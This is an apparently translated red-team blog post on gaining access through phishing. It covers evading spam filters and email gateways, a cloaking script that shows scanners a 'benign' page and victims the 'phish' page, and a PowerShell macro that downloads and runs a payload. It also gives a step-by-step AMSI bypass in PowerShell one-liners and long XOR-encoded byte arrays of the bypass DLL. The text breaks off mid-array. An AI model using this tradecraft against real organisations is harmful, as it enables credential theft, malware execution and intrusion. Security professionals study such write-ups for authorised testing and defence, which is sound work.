Red Team Techniques: Gaining Access Through a Phishing Attack

There are plenty of posts on how red teams build phishing campaigns, but most of them are incomplete.
Below I walk through one of our recent engagements from zero to access: registering the domain, building the phishing pretext, getting past spam filters and what to watch for with email gateways, generating a payload that evades detection, and bypassing AMSI. A list of reference articles is at the end.

Important considerations

  • Where the mail originates
    • Sending from a local script
    • Reputation of the IPs that appear in the headers
  • Whether a recently purchased VPS has any sender history
  • Reputation of the links and age of the domain
  • Use a high-reputation sender such as Mailchimp or Sendgrid
    • Verify your own domain with these providers so the mail shows "From: your domain" instead of "via Mailchimp for XXX"
  • Match the Return-Path to the target's email
  • Configure SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail) and DMARC (an email authentication protocol built on SPF and DKIM that adds a reporting channel between sender and receiver, so both sides can monitor and tighten how the domain is used)
  • Timing and send rate
    • Sending 100 emails at once from a very low-reputation IP will almost certainly be flagged as spam
  • An SSL certificate on the sending domain and on the link
  • Dead links (https://www.computerhope.com/jargon/b/broken_link.htm)
  • The amount of HTML content
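Before the first send it is worth confirming that the domain's SPF and DMARC records actually authorize the provider you deliver through. The Python check below is an added example and not part of the original post: the record strings and the example.com address are constructed, and in practice you would pull the real records with a TXT lookup for the domain and for _dmarc.<domain> and pass them in. It parses both record types, verifies the provider's include and the "all" qualifier, counts SPF DNS lookups against the 10-lookup limit, and flags a DMARC p=none or a missing reporting address.

```python
"""Check that a sending domain's SPF and DMARC records are ready for a campaign.

Added example, not code from the original post. The record strings are
constructed; in practice fetch them with a TXT lookup for <domain> and
_dmarc.<domain> and pass the strings in.
"""
import re

# Constructed sample records for a hypothetical sending domain.
SAMPLE_SPF = "v=spf1 include:servers.mcsv.net include:_spf.google.com ~all"
SAMPLE_DMARC = "v=DMARC1; p=quarantine; rua=mailto:dmarc@example.com; pct=100"

# SPF terms that cost a DNS lookup; RFC 7208 allows at most 10 per evaluation.
LOOKUP_TERM = re.compile(
    r"^[+\-~?]?(include:|a(?=[:/]|$)|mx(?=[:/]|$)|ptr|exists:|redirect=)", re.I)


def parse_spf(record: str) -> dict:
    """Return the mechanisms and the qualifier of the 'all' term ('+', '-', '~', '?')."""
    parts = record.split()
    if not parts or parts[0].lower() != "v=spf1":
        raise ValueError("not an SPF record")
    mechanisms, all_qualifier = [], None
    for term in parts[1:]:
        m = re.fullmatch(r"([+\-~?]?)all", term, re.I)
        if m:
            all_qualifier = m.group(1) or "+"   # a bare 'all' means '+all'
        else:
            mechanisms.append(term)
    return {"mechanisms": mechanisms, "all": all_qualifier}


def parse_dmarc(record: str) -> dict:
    """Return the tag=value pairs of a DMARC record, keys lower-cased."""
    tags = {}
    for item in record.split(";"):
        if "=" in item:
            key, value = item.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


def assess_sender_auth(spf_record: str, dmarc_record: str, senders: list) -> list:
    """List problems that would get mail rejected, leave it spoofable, or hide reports.

    senders: the include hosts your delivery provider asks you to publish.
    """
    spf, dmarc, findings = parse_spf(spf_record), parse_dmarc(dmarc_record), []
    for sender in senders:
        if f"include:{sender}" not in spf["mechanisms"]:
            findings.append(f"SPF does not authorize {sender}")
    lookups = sum(1 for m in spf["mechanisms"] if LOOKUP_TERM.match(m))
    if lookups > 10:
        findings.append(f"SPF needs {lookups} DNS lookups; receivers permerror above 10")
    if spf["all"] == "+":
        findings.append("SPF ends in +all, which authorizes everyone and is treated as no policy")
    elif spf["all"] is None:
        findings.append("SPF has no 'all' term, so unlisted senders are neutral")
    if dmarc.get("p", "none") == "none":
        findings.append("DMARC policy is p=none; nothing is enforced against spoofing")
    if "rua" not in dmarc:
        findings.append("no DMARC rua address, so you get no aggregate reports")
    return findings
```

Run it with the provider's include host as `senders`; an empty result means the records match what the provider expects and the domain will not fail SPF or DMARC at a receiver that enforces them.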

    Staying off blacklists

    How long your engagement runs determines how much attention this deserves.

  • Protection against automated scanning engines. This matters if the site you cloned has a high reputation.

    • Scrapers and SEGs (Secure Email Gateways) can recognize phishing pages for Office 365, Gmail and the like.
    • Serve ordinary content to automated platforms so they don't flag you.
    • You can get a list of web crawlers from the public GreyNoise API using the WEB_CRAWLER tag (only this fragment of the query survives on the page):
```
-s -XPOST -d 'tag
```
    • You can also use techniques that fingerprint headless Chrome, Selenium and similar environments.
  • Host the payload on a high-reputation domain.
    • SEGs are getting better at spotting malicious payloads; if yours is caught, the domain may be blacklisted.
    • Once you've been spotted, a second attempt has little chance of success and the engagement is likely over.
    • Read https://posts.specterops.io/being-a-good-domain-shepherd-part-2-5e8597c3fe63 and check whether your domain is categorized the way that post describes.
  • 301/302 redirects to a high-reputation domain.
    • Your domain may still be categorized as malicious, since it has no real relationship to the domain it redirects to.
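One way to put two of the points above into practice, the crawler list and the headless-browser fingerprint, is a small gate in front of the landing page that hands scanners a filler page and everyone else the real one. The Python below is an added example, not code from the original post: the crawler JSON, the addresses and the user-agent strings are constructed for illustration, and the real GreyNoise response format is not assumed (only an "ip" field is read from whatever you saved).

```python
"""Serve filler to scanners and the real landing page to everyone else.

Added example, not code from the original post. The JSON is a constructed
stand-in for a saved crawler query; only its "ip" field is used. Addresses
are from the RFC 5737 documentation ranges.
"""
import ipaddress
import json

CRAWLER_LIST_JSON = json.dumps({
    "tag": "WEB_CRAWLER",
    "records": [
        {"ip": "192.0.2.10", "name": "constructed-crawler-a"},
        {"ip": "198.51.100.0/24", "name": "constructed-scanner-range"},
    ],
})

# Substrings that rarely appear in a real victim's browser User-Agent.
AUTOMATION_MARKERS = (
    "HeadlessChrome", "PhantomJS", "Selenium", "python-requests",
    "curl/", "Wget/", "Go-http-client", "bot", "crawler", "spider",
)


def load_crawler_networks(raw_json: str) -> list:
    """Turn saved crawler records into ip_network objects (single hosts and CIDRs)."""
    return [ipaddress.ip_network(r["ip"], strict=False)
            for r in json.loads(raw_json)["records"]]


def is_crawler_ip(addr: str, networks: list) -> bool:
    """True if the client address falls in any known crawler/scanner network."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return True   # unparsable REMOTE_ADDR: treat as untrusted and serve filler
    return any(ip in net for net in networks)


def looks_automated(user_agent: str) -> bool:
    """Flag empty UAs and known automation fingerprints (case-insensitive)."""
    if not user_agent:
        return True
    ua = user_agent.lower()
    return any(marker.lower() in ua for marker in AUTOMATION_MARKERS)


def choose_content(remote_ip: str, user_agent: str, networks: list) -> str:
    """Return "benign" (filler page) or "phish" (real landing page)."""
    if is_crawler_ip(remote_ip, networks) or looks_automated(user_agent):
        return "benign"
    return "phish"
```

Wire `choose_content` into the request handler of whatever serves the landing page, and keep the filler a plausible page for the cloned brand so a human analyst who follows the scanner sees nothing suspicious either.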

## Approach
Phishing campaigns are generally handled in one of three ways:
1. A targeted campaign against a specific person
2. Collecting user information during the reconnaissance phase, then a mass send. Some recommended resources: https://github.com/laramies/theHarvester, https://github.com/DataSploit/datasploit, https://github.com/jivoi/awesome-osint, https://medium.com/@micallst/osint-resources-for-2019-b15d55187c3f
3. Submitting a form on the target's own site, usually while posing as a made-up company


Use a different domain for every campaign so they cannot drag down each other's reputation, and scale campaigns up from small to large: once the company realizes it is a target, every later campaign faces stricter scrutiny. We usually deliver through Mailchimp after verifying the domain and setting up email authentication. We have also had success sending with our own scripts through a G Suite account with SMTP authentication.

Because of the time limit (20 hours) we chose options 2 and 3. For both campaigns we used a malicious Word document with a macro.

## Reconnaissance
An MX lookup showed that the target company uses G Suite:

```
dig evilwing.me MX
```

![](https://raw.githubusercontent.com/evilwing/wing-images/master/img/20190221203000.png)

This example uses my own domain.

Google is good at filtering malicious attachments, so in this pair of campaigns the first hosted the malicious file on a high-reputation domain and the second hosted it on our own domain.

## Attack preparation: generating the Word document and payload

Use [unicorn](https://github.com/trustedsec/unicorn) to generate a malicious PowerShell macro that downloads and executes the payload.
A small change gets it past Defender: build the `powershell.exe` string from concatenated fragments in the VBA so the literal name never appears in the macro:

```
"po" & "w" & "er" & "s" & "he" & "l" & "l" & ".e" & "x" & "e" & " "
```

We used [hershell](https://github.com/lesnuages/hershell) as the payload, a lightweight stager written in Go; at the time its x86 build was not detected. Once the payload is generated, obfuscate and encrypt it. If you know the target environment you can also locate AV signatures by hand with something like dsplit. Some resources:

https://resources.infosecinstitute.com/antivirus-evasion-tools/

https://github.com/PowerShellMafia/PowerSploit/blob/master/AntivirusBypass/Find-AVSignature.ps1

http://obscuresecurity.blogspot.com/2012/12/finding-simple-av-signatures-with.html

msf5 also recently added two evasion modules.

## AMSI bypass
To execute our PowerShell code we have to get past Microsoft's AMSI (Antimalware Scan Interface): before PowerShell runs script content it submits it to the registered scanning engine (Windows Defender) for analysis. Fortunately [CyberArk](https://www.cyberark.com/threat-research-blog/amsi-bypass-redux/) had already researched a bypass. Microsoft has since signatured it, and we get around the signature by XOR-encoding the bypass DLL.

On the attacker machine:

  1. Recompile the AMSI bypass DLL
  2. Convert the binary to base64: `$base64string = [Convert]::ToBase64String([IO.File]::ReadAllBytes("$pwd\bypass.dll"))`
  3. XOR-encrypt it (initialize `$encrypted` as an array first, otherwise `+=` on an uninitialized variable sums the bytes instead of collecting them): `$encrypted = @(); foreach($byte in [Text.Encoding]::UTF8.GetBytes($base64string)) { $encrypted += $byte -bxor 1 }`
  4. Print the encrypted buffer as a byte array: `foreach($byte in $encrypted){ Write-Host -nonewline "$byte," }`

On target:

  1. Split the encrypted buffer into several arrays because of PowerShell line-length limits
  2. Concatenate the buffer: `$xorencrypted = $a + $b + $c + $d + $e + $f + $g`
  3. Decrypt the buffer: `$decrypted = @(); foreach($byte in $xorencrypted){ $decrypted += $byte -bxor 1 }`
  4. Recover the base64 string: `$base64string = [Text.Encoding]::UTF8.GetString($decrypted)`
  5. Load the DLL using reflection: `function Bypass-AMCEE { if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMCEE").Type) { [Reflection.Assembly]::Load([Convert]::FromBase64String($base64string)) | Out-Null } [Bypass.AMCEE]::Subvert(); }`
  6. Call the bypass method: `Bypass-AMCEE`

This lets us run payloads such as Mimikatz in memory.
The full AMSI bypass script: https://gist.github.com/jkamdjou/fcba44227cda85eb8829ee43646c6c77

$a = @(85,87,112,80,64,64,76,64,64,64,64,68,64,64,64,64,46,46,57,64,64,77,102,64,64,64,64,64,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,102,64,64,64,64,64,53,103,116,102,53,64,117,64,111,79,72,99,102,67,85,76,49,105,87,70,105,113,98,120,67,118,98,108,56,111,98,108,71,117,72,70,79,105,99,108,52,119,101,66,67,104,91,82,67,120,101,86,53,102,96,86,53,102,83,68,56,85,72,70,48,119,91,70,84,116,69,80,49,74,75,64,64,64,64,64,64,64,64,64,67,80,83,80,64,64,85,64,68,69,64,77,117,66,77,109,118,64,64,64,64,64,64,64,64,64,64,78,64,64,72,104,64,77,64,85,64,64,64,64,53,64,64,64,64,70,64,64,64,64,64,64,64,64,66,104,118,64,64,64,64,102,64,64,64,64,80,64,64,64,64,64,64,64,68,64,64,102,64,64,64,64,64,102,64,64,67,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,64,64,64,64,64,64,66,64,64,64,64,64,64,102,64,64,64,64,64,64,64,64,76,64,88,72,84,64,64,67,64,64,64,67,64,64,64,64,64,64,68,64,64,64,68,64,64,64,64,64,64,64,64,67,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,77,102,115,64,64,67,81,64,64,64,64,64,68,64,64,64,70,102,69,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,70,64,64,64,64,118,64,64,64,66,64,74,102,64,64,73,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,72,64,64,64,66,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,66,64,64,64,68,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,52,49,91,89,105,49,64,64,64,64,70,64,118,64,64,64,64,102,64,64,64,64,69,102,64,64,64,64,72,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,66,64,64,64,70,64,116,98,111,79,120,88,118,64,64,64,70,102,69,64,64,64,64,80,64,64,64,64,64,80,64,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,64,64,64,67,64,77,111,75,109,99,70,56,107,64,64,64,76,64,64,64,64,64,70,64,64,64,64,64,66,64,64,64,64,71,64,64,64,64,64,64,64,64,6
4,64,64,64,64,64,64,64,64,64,64,80,64,64,64,80,102,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,69,114,74,118,64,64,64,64,64,64,64,68,102,64,64,64,64,66,64,64,84,64,74,66,68,64,64,71,102,75,64,64,64,67,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,76,118,67,64,69,69,64,64,64,64,64,80,64,64,68,80,67,120,64,80,64,64,98,66,102,80,64,64,64,74,64,73,72,83,64,64,67,118,74,64,72,64,64,64,88,74,67,111,53,83,64,64,64,74,74,67,72,64,64,64,110,85,67,105,68,70,77,64,106,64,71,121,76,73,78,72,57,64,64,64,64,70,98,104,76,64,64,73,64,110,64,80,64,64,67,102,114,73,103,105,68,64,64,64,110,110,68,102,64,64,66,105,76,72,68,80,102,114,67,102,64,89,68,118,98,115,99,67,117,112,74,67,76,64,64,64,110,76,71,102,49,73,66,67,56,64,68,102,76,110,64,118,64,64,67,105,99,42,64,83,76,75,68,80,106,114,67,102,64,89,68,118,98,115,82,67,108,79,71,102,64,64,64,82,89,80,64,80,64,64,67,66,102,84,64,64,64,74,68,118,80,91,74,67,84,64,64,64,110,85,67,83,68,68,71,105,68,71,70,82,102,86,64,64,64,74,64,64,98,103,70,120,102,89,64,64,64,74,68,80,84,91,74,64,80,64,64,64,88,64,98,106,68,64,64,73,64,110,68,64,64,64,66,102,64,86,68,118,98,115,64,67,68,73,74,104,72,66,74,67,102,64,64,64,110,64,74,106,75,85,82,106,72,67,64,64,68,64,64,64,64,64,64,64,118,64,64,64,67,51,79,66,53,118,77,107,76,118,76,123,68,52,64,64,64,64,64,64,84,64,99,64,64,64,64,67,118,69,64,64,64,107,103,102,64,64,104,64,76,64,64,81,102,69,64,64,64,107,84,50,83,120,96,86,52,111,98,118,64,64,64,64,66,64,67,118,64,64,88,64,64,64,64,66,79,87,84,118,69,102,67,118,64,64,68,64,64,64,64,66,79,73,87,84,109,68,64,64,64,64,57,64,98,64,64,70,102,67,64,64,64,107,80,108,121,119,88,102,64,64,64,64,64,64,64,64,64,66,64,64,64,67,87,52,84,66,79,64,106,66,64,64,64,64,42,102,68,123,64,67,88,64,64,64,68,64,64,64,64,96,64,64,64,64,67,64,64,64,64,64,68,64,64,64,64,70,64,64,64,64,66,10
2,64,64,64,67,102,64,64,64,64,81,64,64,64,64,64,80,64,64,64,64,68,64,64,64,64,66,64)

$b = @(64,64,64,67,64,64,64,64,64,68,64,64,64,64,67,64,64,64,64,64,80,64,64,64,64,68,64,64,64,64,64,64,75,118,66,64,80,64,64,64,64,64,64,67,102,69,68,64,83,68,69,67,102,64,121,64,105,68,69,67,102,69,53,64,79,57,66,69,118,64,121,64,118,64,64,67,102,64,102,64,96,53,66,67,102,66,111,64,96,53,66,67,102,66,72,64,96,53,66,67,102,64,88,64,112,53,66,67,102,69,106,64,96,53,66,67,102,69,56,64,96,53,66,67,102,64,50,64,96,53,66,67,102,64,76,64,103,72,66,67,102,69,112,64,81,72,66,67,102,67,115,64,96,53,66,67,102,67,82,64,86,64,66,67,102,67,119,64,55,98,66,67,102,69,81,64,67,68,69,67,102,69,71,64,74,98,66,67,102,66,101,64,74,98,66,67,102,69,88,64,112,98,66,67,102,69,89,64,112,98,66,67,102,67,81,64,112,98,66,67,102,67,64,64,121,68,69,67,102,69,68,64,55,98,66,67,102,66,74,64,74,98,66,67,102,66,73,64,119,72,66,64,64,64,64,64,66,88,64,64,64,64,64,64,64,68,64,64,80,64,67,64,67,64,64,101,118,67,81,64,49,68,64,64,80,64,67,64,64,64,67,64,64,64,119,64,64,64,64,80,80,64,67,64,64,98,64,68,118,68,64,64,64,110,64,64,64,67,75,64,64,72,64,67,118,64,123,64,84,53,64,88,64,64,64,64,64,64,64,102,64,66,86,72,71,88,69,91,64,64,67,64,64,64,64,64,64,66,64,64,75,88,102,123,118,79,112,64,64,76,64,64,64,64,64,64,72,64,64,109,104,66,71,64,51,57,64,67,64,64,64,64,64,64,64,102,64,66,83,72,79,53,69,100,64,64,72,64,71,64,102,64,64,64,64,64,75,88,64,115,80,79,46,64,64,114,64,73,120,68,64,64,64,64,64,105,105,107,83,64,102,88,64,66,118,64,64,64,64,68,64,113,80,64,64,64,64,72,64,115,80,64,64,64,64,68,64,117,102,64,64,64,64,68,64,91,80,76,64,64,64,72,64,87,64,72,64,64,64,76,64,109,64,76,66,64,64,80,64,101,102,76,64,64,64,68,64,117,80,76,64,64,64,72,64,105,102,64,64,64,64,76,64,86,118,72,75,64,79,68,66,64,80,64,83,64,79,68,66,67,102,64,91,64,79,68,66,66,102,64,113,64,79,68,66,68,64,64,121,64,79,68,66,68,64,64,52,64,79,68,66,68,64,67,67,64,79,68,66,68,64,67,75,64,79,68,66,68,64,67,83,64,79,68,66,68,64,67,91,64,79,68,66,68,64,67,105,64,79,68,66,71,80,67,113,64,79,68,66,68,64,67,121,64,79,68,66,68,64,67,52,64,79,68,66,
68,64,66,75,64,79,68,66,67,102,66,91,64,77,114,64,74,64,66,105,64,76,118,66,77,80,66,105,64,78,106,69,76,64,66,113,64,74,68,69,79,102,66,52,64,77,110,69,78,118,69,83,64,73,110,66,80,118,69,83,64,76,110,69,82,64,66,105,64,76,64,66,84,80,66,67,64,79,68,66,67,102,64,116,64,64,114,64,102,118,64,116,64,67,76,64,107,64,64,116,64,67,114,64,112,118,64,116,64,66,76,64,117,64,64,116,64,66,114,64,118,64,64,116,64,69,76,64,118,64,64,116,64,69,114,64,118,64,64,116,64,68,76,64,117,64,64,116,64,68,114,64,121,102,64,116,64,71,76,64,118,64,64,116,64,71,114,64,118,64,64,116,64,70,76,64,50,102,64,116,64,70,114,64,66,64,68,116,64,73,76,64,71,80,71,107,64,73,114,64,88,118,68,67,64,64,76,64,64,64,64,68,64,67,110,64,64,80,66,81,64,102,64,67,64,118,67,86,64,118,68,64,64,64,68,71,64,76,57,69,64,80,64,64,64,80,98,64,105,80,76,67,64,64,64,67,66,80,69,99,64,118,72,64,68,66,118,64,64,64,68,64,67,72,64,64,64,64,68,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,85,118,76,64,64,64,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,71,98,64,103,80,64,64,64,64,64,64,67,64,64,69,64,64,64,64,64,64,64,64,96,51,87,120,99,108,87,114,76,123,72,64,89,48,56,85,101,70,71,49,96,86,79,67,98,111,75,105,100,84,109,116,96,89,83,84,100,89,67,109,84,51,109,55,91,85,49,123,64,69,121,79,99,51,83,48,99,70,84,42,64,69,121,80,98,108,109,51,88,89,83,109,82,86,48,118,99,70,87,117,91,86,52,49,88,89,83,113,99,51,52,68,91,89,83,105,96,86,121,123,81,102,64,48)

$c = @(76,84,79,67,83,106,72,49,78,69,68,123,78,84,72,118,76,106,84,118,79,107,71,68,79,69,106,121,78,84,76,48,76,85,98,51,79,107,72,121,80,106,88,53,79,49,83,67,80,49,87,68,64,68,71,79,80,49,87,71,64,70,48,123,88,51,56,120,99,70,109,104,64,73,79,120,88,118,67,82,101,86,52,49,96,86,48,109,83,108,109,109,99,70,83,72,88,86,52,106,99,70,84,64,80,51,56,116,98,51,56,114,91,80,67,110,85,86,56,106,101,86,121,109,64,73,67,120,99,51,79,78,88,86,48,109,64,70,52,105,99,86,84,64,87,50,75,113,101,70,87,76,96,86,52,109,64,71,91,105,99,73,87,109,87,73,109,118,91,80,67,69,99,51,48,118,96,86,121,109,98,106,101,109,99,108,87,120,88,89,83,109,91,68,71,49,101,73,75,113,88,111,87,49,91,80,67,73,101,86,109,106,80,89,83,49,98,108,109,104,101,89,83,109,64,68,83,109,88,111,87,111,91,51,71,104,99,70,87,67,101,73,83,120,96,86,75,48,101,70,84,64,80,51,56,117,87,108,109,123,96,86,75,114,91,84,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,87,83,113,101,70,121,109,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,87,73,75,105,91,70,87,117,88,89,75,115,80,89,83,49,98,108,109,104,101,89,83,109,64,71,83,105,98,108,101,109,101,68,91,120,88,86,48,109,101,51,56,120,96,49,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,84,91,113,99,70,87,86,91,89,75,123,96,86,56,116,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,116,91,108,109,111,101,89,75,105,101,70,109,119,99,106,71,49,101,73,75,113,88,111,87,49,91,80,67,67,98,50,79,109,99,86,75,114,100,84,83,109,98,51,79,120,96,89,67,49,96,86,56,116,80,89,83,49,98,108,109,104,101,89,83,109,64,68,79,119,99,89,67,113,99,70,71,49,96,86,56,116,84,108,87,114,88,89,105,105,101,70,109,119,99,111,79,67,101,73,83,120,96,86,75,48,101,70,84,64,80,89,79,123,91,86,48,104,99,73,109,80,98,108,56,106,101,86,79,49,80,89,83,49,98,108,109,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,118,100,89,75,113,91,51,105,49,80,89,83,49,98,108,109
,104,101,89,83,109,64,68,71,123,98,51,87,117,88,108,121,52,80,51,56,117,98,70,71,116,100,84,71,49,101,73,75,113,88,111,87,49,91,80,67,82,101,86,52,49,96,86,48,109,80,51,56,117,98,70,71,49,96,86,75,113,99,70,109,49,100,84,71,49,101,73,75,113,88,111,87,49,91,80,67,66,100,89,83,109,64,70,83,50,84,51,109,55,91,80,67,123,96,89,113,109,64,71,79,52,98,50,83,109,99,82,52,82,101,86,52,49,96,86,48,109,77,109,91,109,98,111,79,113,99,51,52,113,99,108,98,64,80,86,121,114,99,51,79,72,83,51,121,119,88,108,71,114,64,68,48,105,98,111,79,110,88,86,118,64,82,51,87,120,99,108,87,114,76,123,72,116,91,70,121,114,64,68,75,52,98,70,71,123,98,120,52,106,99,70,118,64,84,50,109,123,101,70,87,117,64,71,79,52,98,50,83,109,99,82,52,82,91,86,91,114,91,86,79,49,96,86,56,116,64,70,56,118,89,49,71,106,91,70,109,49,96,86,56,116,64,71,113,109,98,108,57,64,77,108,79,49,99,50,72,64,87,84,109,116,101,71,67,49,98,102,67,85,100,89,79,49,91,86,49,116,83,70,109,105,91,51,52,119,98,50,83,113,88,50,76,64,84,50)

$d = @(109,123,101,70,87,117,77,109,75,48,99,111,83,113,99,86,84,116,82,86,52,49,91,89,75,119,98,71,79,109,98,111,91,113,88,51,87,123,64,71,79,52,98,50,83,109,99,82,52,82,101,86,52,49,96,86,48,109,77,106,79,119,99,89,67,113,99,70,87,120,84,51,87,120,101,108,109,107,91,89,76,64,83,70,87,104,101,86,101,111,96,86,52,111,85,86,56,106,91,89,76,64,84,111,87,116,101,70,109,117,91,84,105,109,99,73,67,109,98,111,76,64,80,111,109,118,88,89,79,123,64,68,101,109,101,71,67,120,99,51,79,67,91,70,83,120,91,89,79,123,64,70,121,118,80,86,83,106,98,108,87,123,98,118,67,81,88,108,113,109,88,50,80,64,99,73,67,108,99,68,56,114,91,71,67,120,99,50,83,109,88,50,80,64,87,108,109,120,101,73,87,105,99,71,67,120,99,50,83,109,88,50,80,64,91,108,121,78,91,89,101,80,98,108,56,49,91,86,79,49,64,70,56,118,89,49,87,53,98,70,121,113,88,51,109,49,64,71,79,48,88,111,91,109,98,111,80,64,91,70,87,123,101,64,67,75,99,108,109,49,96,86,71,114,96,89,113,109,80,89,75,120,88,89,106,64,80,51,56,118,100,80,67,76,99,51,71,106,85,70,109,104,98,108,71,120,100,80,67,82,101,70,121,79,99,50,91,109,85,86,87,117,99,50,75,52,64,70,56,118,89,49,87,121,101,86,71,114,96,89,83,52,64,64,64,64,64,64,64,81,84,102,67,48,64,70,53,64,99,102,67,113,64,70,53,64,91,118,64,64,68,86,68,64,99,80,67,123,64,70,106,64,77,102,67,106,64,70,118,64,99,64,64,64,73,84,68,64,99,80,67,123,64,70,106,64,84,118,67,107,64,70,68,64,99,102,67,66,64,73,84,64,91,102,67,108,64,70,84,64,98,102,64,64,73,89,64,64,88,80,67,49,64,70,76,64,96,64,64,102,64,70,68,64,98,64,67,118,64,70,118,64,96,80,67,109,64,70,80,64,77,102,64,64,64,74,119,84,84,119,53,96,78,51,109,81,114,49,55,107,110,114,66,114,78,74,118,64,67,66,64,67,64,80,102,69,72,64,64,67,67,82,64,67,64,83,68,83,67,66,64,67,64,80,53,68,72,64,68,67,64,102,49,73,66,105,102,88,70,80,106,101,67,83,102,66,66,64,72,66,67,64,64,67,64,80,53,66,67,105,102,71,64,64,72,66,70,67,102,68,64,64,68,91,66,118,98,64,64,102,68,82,88,83,71,109,67,64,64,67,70,64,102,72,64,64,80,67,73,80,84,72,70,64,102,71,64,64,72,88,70,64,102,7
2,117,50,113,98,87,105,106,49,53,72,106,69,67,105,68,80,67,80,64,66,70,67,102,78,67,64,64,67,70,64,53,72,64,64,80,66,70,67,106,75,68,64,106,70,64,64,76,67,70,67,102,72,64,118,64,64,66,64,102,67,64,64,102,64,64,64,64,64,64,67,53,67,64,64,68,64,87,64,72,86,87,50,75,105,98,68,52,119,99,106,87,53,88,51,87,118,101,70,109,119,99,109,83,110,98,108,56,50,98,118,68,72,64,80,64,73,64,80,64,64,64,64,64,77,64,80,64,70,80,111,109,118,88,89,79,123,64,64,64,71,64,80,64,64,64,64,64,89,64,80,64,82,80,51,56,118,100,89,75,113,91,51,105,49,72,76,74,113,72,66,64,120,76,69,68,52,64,64,64,113,64,80,64,106,88,123,68,120,88,123,88,53,76,108,88,117,79,85,67,106,76,82,49,49,76,107,88,48,77,85,106,50,88,86,84,117,79,69,84,123,79,123,76,48,91,86,75,108,88,86,80,123,64,64,64,76,64,80,64,73,76,82,53,118,77,107,64,116,76,64,64,64,85,80,68,64,73,66,52,78,83,87,83,70,98,108,71,117,91,89,101,119,98,108,114,114,87,108,87,120,98,51,109,119,99,107,48,51,79,66,53,48,77,107,72,67,64,71,80,78,71,68,91,120,88,86,48,109,101,51,56,120,96,49,83,113,98,50,67,114,88,89,109,78,88,86,48,109,71,66,52,78,83,87,80,102,83,111,75,105,99,86,87,50,99,50,75,115,72,69,80,116,79,82,53,120,67,64,68,64,64,64,64,64,64,64,64,64,116,49,72,116,89,64,64,64,64,64,64,66,64,64,64,64,73,64,68,64,64,75,118,112,64,64,66,98,69,64,64,64,84,109,79,68,84,123,51,67,98,101,66,73,66,74,83,76,111,54,117,91,68,115,112,76,103,68,114,67,64,64,64,64,80,123,113,98,87,89,79,109,98,111,79)

$e = @(98,96,108,56,123,96,71,121,68,99,51,79,48,99,86,87,116,101,73,79,98,87,108,109,123,101,86,71,114,72,71,79,49,101,86,83,113,99,120,64,120,76,69,68,50,89,71,67,120,99,51,113,109,88,50,83,123,89,68,75,52,98,70,71,123,98,48,121,66,100,89,67,105,98,50,79,98,99,51,75,112,89,68,83,109,88,111,87,111,89,68,75,52,98,70,71,123,98,120,52,118,91,70,72,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,69,102,74,118,64,64,64,64,64,64,64,64,64,64,64,64,69,55,74,118,64,64,64,66,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,54,66,114,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,67,103,80,51,56,120,83,70,121,114,85,86,71,113,99,102,67,117,98,51,79,119,98,108,87,109,77,108,83,114,99,64,64,64,64,64,64,64,46,120,84,64,72,64,64,80,76,103,42,80,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,64,